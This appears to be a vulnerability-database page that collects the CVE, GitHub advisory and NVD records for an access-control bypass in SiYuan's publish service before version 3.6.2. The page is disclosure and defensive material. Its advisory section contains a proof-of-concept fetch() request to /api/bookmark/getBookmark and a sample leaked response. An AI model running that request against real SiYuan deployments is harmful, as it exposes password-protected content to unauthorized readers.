Vulnerability-Lookup

CVE-2026-34453 (GCVE-0-2026-34453)

Vulnerability from cvelistv5 – Published: 2026-03-31 21:43 – Updated: 2026-04-01 15:53

Title

SiYuan: Broken access control in /api/bookmark/getBookmark allows unauthenticated publish visitors to read password-protected bookmarked content

Summary

SiYuan is a personal knowledge management system. Prior to version 3.6.2, the publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, /api/bookmark/getBookmark filters bookmark results by calling FilterBlocksByPublishAccess(nil, ...). Because the filter treats a nil context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as Protected. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked. This issue has been patched in version 3.6.2.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-863 - Incorrect Authorization

Assigner

GitHub_M

References

URL

Tags

	https://github.com/siyuan-note/siyuan/security/ad…	x_refsource_CONFIRM
	https://github.com/siyuan-note/siyuan/issues/17246	x_refsource_MISC
	https://github.com/siyuan-note/siyuan/releases/ta…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	siyuan-note	siyuan	Affected: < 3.6.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-34453",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-01T15:30:20.251585Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-01T15:53:02.043Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "siyuan",
          "vendor": "siyuan-note",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.6.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, the publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, /api/bookmark/getBookmark filters bookmark results by calling FilterBlocksByPublishAccess(nil, ...). Because the filter treats a nil context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as Protected. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked. This issue has been patched in version 3.6.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-863",
              "description": "CWE-863: Incorrect Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-31T21:43:32.138Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/issues/17246",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/issues/17246"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.2"
        }
      ],
      "source": {
        "advisory": "GHSA-c77m-r996-jr3q",
        "discovery": "UNKNOWN"
      },
      "title": "SiYuan: Broken access control in /api/bookmark/getBookmark allows unauthenticated publish visitors to read password-protected bookmarked content"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-34453",
    "datePublished": "2026-03-31T21:43:32.138Z",
    "dateReserved": "2026-03-27T18:18:14.895Z",
    "dateUpdated": "2026-04-01T15:53:02.043Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-34453\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-31T22:16:20.483\",\"lastModified\":\"2026-04-03T16:53:22.330\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SiYuan is a personal knowledge management system. Prior to version 3.6.2, the publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, /api/bookmark/getBookmark filters bookmark results by calling FilterBlocksByPublishAccess(nil, ...). Because the filter treats a nil context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as Protected. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked. This issue has been patched in version 3.6.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6.2\",\"matchCriteriaId\":\"27CB71A7-7208-417A-AE6D-266D57F683E9\"}]}]}],\"references\":[{\"url\":\"https://github.com/siyuan-note/siyuan/issues/17246\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/releases/tag/v3.6.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
  }
}

GHSA-C77M-R996-JR3Q

Vulnerability from github – Published: 2026-03-31 23:30 – Updated: 2026-03-31 23:30

Summary

SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark

Details

Summary

The publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, /api/bookmark/getBookmark filters bookmark results by calling FilterBlocksByPublishAccess(nil, ...). Because the filter treats a nil context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as Protected. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked.

Details

The issue is caused by an authorization bypass in the bookmark API path used by the publish service.

In kernel/api/bookmark.go, getBookmark checks whether the current request is in a read-only role and then filters bookmarks for publish access. However, it passes nil as the request context:

if model.IsReadOnlyRoleContext(c) {
    publishAccess := model.GetPublishAccess()
    tempBookmarks := &model.Bookmarks{}
    for _, bookmark := range *bookmarks {
        bookmark.Blocks = model.FilterBlocksByPublishAccess(nil, publishAccess, bookmark.Blocks)

In kernel/model/publish_access.go, FilterBlocksByPublishAccess allows access when c == nil:

if CheckPathAccessableByPublishIgnore(block.Box, block.Path, publishIgnore) &&
   (c == nil || password == "" || CheckPublishAuthCookie(c, passwordID, password)) {
    ret = append(ret, block)
}

This bypasses the intended password enforcement performed by CheckPublishAuthCookie, which validates the publish-auth-<id> cookie for protected content.

The publish proxy authenticates anonymous publish visitors with a RoleReader token, and CheckAuth accepts RoleReader, so unauthenticated publish visitors can reach /api/bookmark/getBookmark and trigger the vulnerable code path.

I reproduced this by creating a protected document, bookmarking a block inside it, opening the publish service in an incognito session without entering the document password, and sending a POST /api/bookmark/getBookmark request. The response returned a bookmark group containing the protected block in data[0].blocks, confirming the bypass.

PoC

Start SiYuan with the publish service enabled.
Create a new document, for example publish-bookmark-poc.
Add a block containing identifiable content, for example BOOKMARK_SECRET_123.
Open the block attributes and assign a bookmark label, for example leak-test.
In Doc Tree, enable Publish Access Control and set the document to Protected.
Set a password for that document, for example test123, and confirm the change.
Open the publish service in a fresh incognito/private browser session.
Verify that opening the protected document through the publish UI requires the password.
Without entering the password, open the browser developer console and run:

fetch("/api/bookmark/getBookmark", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: "{}"
})
  .then(r => r.json())
  .then(x => console.log(JSON.stringify(x, null, 2)));

Observe that the response contains a bookmark entry such as:

{
  "code": 0,
  "msg": "",
  "data": [
    {
      "name": "leak-test",
      "blocks": [
        {
          "box": "20260327012540-ppsxc5j",
          "path": "/20260327012543-acu1mdn.sy",
          "hPath": "/publish-bookmark-poc",
          "id": "20260327012543-1y6djn1",
          "rootID": "20260327012543-acu1mdn",
          "parentID": "20260327012543-acu1mdn",
          "name": "",
          "alias": "",
          "memo": "",
          "tag": "",
          "content": "<span data-type=\"code\">BOOKMARK_SECRET_123</span>",
          "fcontent": "",
          "markdown": "`BOOKMARK_SECRET_123`",
          "folded": false,
          "type": "NodeParagraph",
          "subType": "",
          "refText": "",
          "refs": null,
          "defID": "",
          "defPath": "",
          "ial": {
            "bookmark": "leak-test",
            "id": "20260327012543-1y6djn1",
            "updated": "20260327013116"
          },
          "children": null,
          "depth": 1,
          "count": 0,
          "refCount": 0,
          "sort": 10,
          "created": "",
          "updated": "",
          "riffCardID": "",
          "riffCard": null
        }
      ],
      "type": "bookmark",
      "depth": 0,
      "count": 1
    }
  ]
}

Actual result: /api/bookmark/getBookmark returns bookmarked blocks from protected documents without requiring the publish password.

Impact

An unauthenticated attacker who can access the publish service can read bookmarked content from documents configured as password-protected. This breaks the confidentiality guarantee of the Protected publish access level. The impact is limited to blocks that have been bookmarked, but the leakage is direct, requires no user interaction, and does not require knowledge of the document password.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34453"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-31T23:30:03Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nThe publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, `/api/bookmark/getBookmark` filters bookmark results by calling `FilterBlocksByPublishAccess(nil, ...)`. Because the filter treats a `nil` context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as `Protected`. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked.\n\n### Details\nThe issue is caused by an authorization bypass in the bookmark API path used by the publish service.\n\nIn `kernel/api/bookmark.go`, `getBookmark` checks whether the current request is in a read-only role and then filters bookmarks for publish access. However, it passes `nil` as the request context:\n```go\nif model.IsReadOnlyRoleContext(c) {\n    publishAccess := model.GetPublishAccess()\n    tempBookmarks := \u0026model.Bookmarks{}\n    for _, bookmark := range *bookmarks {\n        bookmark.Blocks = model.FilterBlocksByPublishAccess(nil, publishAccess, bookmark.Blocks)\n```\nIn `kernel/model/publish_access.go`, `FilterBlocksByPublishAccess` allows access when `c == nil`:\n```go\nif CheckPathAccessableByPublishIgnore(block.Box, block.Path, publishIgnore) \u0026\u0026\n   (c == nil || password == \"\" || CheckPublishAuthCookie(c, passwordID, password)) {\n    ret = append(ret, block)\n}\n```\nThis bypasses the intended password enforcement performed by `CheckPublishAuthCookie`, which validates the `publish-auth-\u003cid\u003e` cookie for protected content.\n\nThe publish proxy authenticates anonymous publish visitors with a `RoleReader` token, and `CheckAuth` accepts `RoleReader`, so unauthenticated publish visitors can reach `/api/bookmark/getBookmark` and trigger the vulnerable code path.\n\nI reproduced this by creating a protected document, bookmarking a block inside it, opening the publish service in an incognito session without entering the document password, and sending a `POST /api/bookmark/getBookmark` request. The response returned a bookmark group containing the protected block in `data[0].blocks`, confirming the bypass.\n\n### PoC\n\n1. Start SiYuan with the publish service enabled.\n2. Create a new document, for example publish-bookmark-poc.\n3. Add a block containing identifiable content, for example BOOKMARK_SECRET_123.\n4. Open the block attributes and assign a bookmark label, for example leak-test.\n5. In Doc Tree, enable Publish Access Control and set the document to Protected.\n6. Set a password for that document, for example test123, and confirm the change.\n7. Open the publish service in a fresh incognito/private browser session.\n8. Verify that opening the protected document through the publish UI requires the password.\n9. Without entering the password, open the browser developer console and run:\n```js\nfetch(\"/api/bookmark/getBookmark\", {\n  method: \"POST\",\n  headers: { \"Content-Type\": \"application/json\" },\n  body: \"{}\"\n})\n  .then(r =\u003e r.json())\n  .then(x =\u003e console.log(JSON.stringify(x, null, 2)));\n```\n10. Observe that the response contains a bookmark entry such as:\n```json\n{\n  \"code\": 0,\n  \"msg\": \"\",\n  \"data\": [\n    {\n      \"name\": \"leak-test\",\n      \"blocks\": [\n        {\n          \"box\": \"20260327012540-ppsxc5j\",\n          \"path\": \"/20260327012543-acu1mdn.sy\",\n          \"hPath\": \"/publish-bookmark-poc\",\n          \"id\": \"20260327012543-1y6djn1\",\n          \"rootID\": \"20260327012543-acu1mdn\",\n          \"parentID\": \"20260327012543-acu1mdn\",\n          \"name\": \"\",\n          \"alias\": \"\",\n          \"memo\": \"\",\n          \"tag\": \"\",\n          \"content\": \"\u200b\u003cspan data-type=\\\"code\\\"\u003e\u200bBOOKMARK_SECRET_123\u003c/span\u003e\u200b\",\n          \"fcontent\": \"\",\n          \"markdown\": \"`BOOKMARK_SECRET_123`\",\n          \"folded\": false,\n          \"type\": \"NodeParagraph\",\n          \"subType\": \"\",\n          \"refText\": \"\",\n          \"refs\": null,\n          \"defID\": \"\",\n          \"defPath\": \"\",\n          \"ial\": {\n            \"bookmark\": \"leak-test\",\n            \"id\": \"20260327012543-1y6djn1\",\n            \"updated\": \"20260327013116\"\n          },\n          \"children\": null,\n          \"depth\": 1,\n          \"count\": 0,\n          \"refCount\": 0,\n          \"sort\": 10,\n          \"created\": \"\",\n          \"updated\": \"\",\n          \"riffCardID\": \"\",\n          \"riffCard\": null\n        }\n      ],\n      \"type\": \"bookmark\",\n      \"depth\": 0,\n      \"count\": 1\n    }\n  ]\n}\n```\nActual result:\n`/api/bookmark/getBookmark` returns bookmarked blocks from protected documents without requiring the publish password.\n\n### Impact\nAn unauthenticated attacker who can access the publish service can read bookmarked content from documents configured as password-protected. This breaks the confidentiality guarantee of the `Protected` publish access level. The impact is limited to blocks that have been bookmarked, but the leakage is direct, requires no user interaction, and does not require knowledge of the document password.",
  "id": "GHSA-c77m-r996-jr3q",
  "modified": "2026-03-31T23:30:03Z",
  "published": "2026-03-31T23:30:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark"
}

FKIE_CVE-2026-34453

Vulnerability from fkie_nvd - Published: 2026-03-31 22:16 - Updated: 2026-04-03 16:53

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/siyuan-note/siyuan/issues/17246	Issue Tracking
security-advisories@github.com	https://github.com/siyuan-note/siyuan/releases/tag/v3.6.2	Release Notes
security-advisories@github.com	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	b3log	siyuan	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9",
              "versionEndExcluding": "3.6.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, the publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, /api/bookmark/getBookmark filters bookmark results by calling FilterBlocksByPublishAccess(nil, ...). Because the filter treats a nil context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as Protected. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked. This issue has been patched in version 3.6.2."
    }
  ],
  "id": "CVE-2026-34453",
  "lastModified": "2026-04-03T16:53:22.330",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-31T22:16:20.483",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/siyuan-note/siyuan/issues/17246"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-863"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-34453 (GCVE-0-2026-34453)

GHSA-C77M-R996-JR3Q

Summary

Details

PoC

Impact

FKIE_CVE-2026-34453

Tags

Sightings

Nomenclature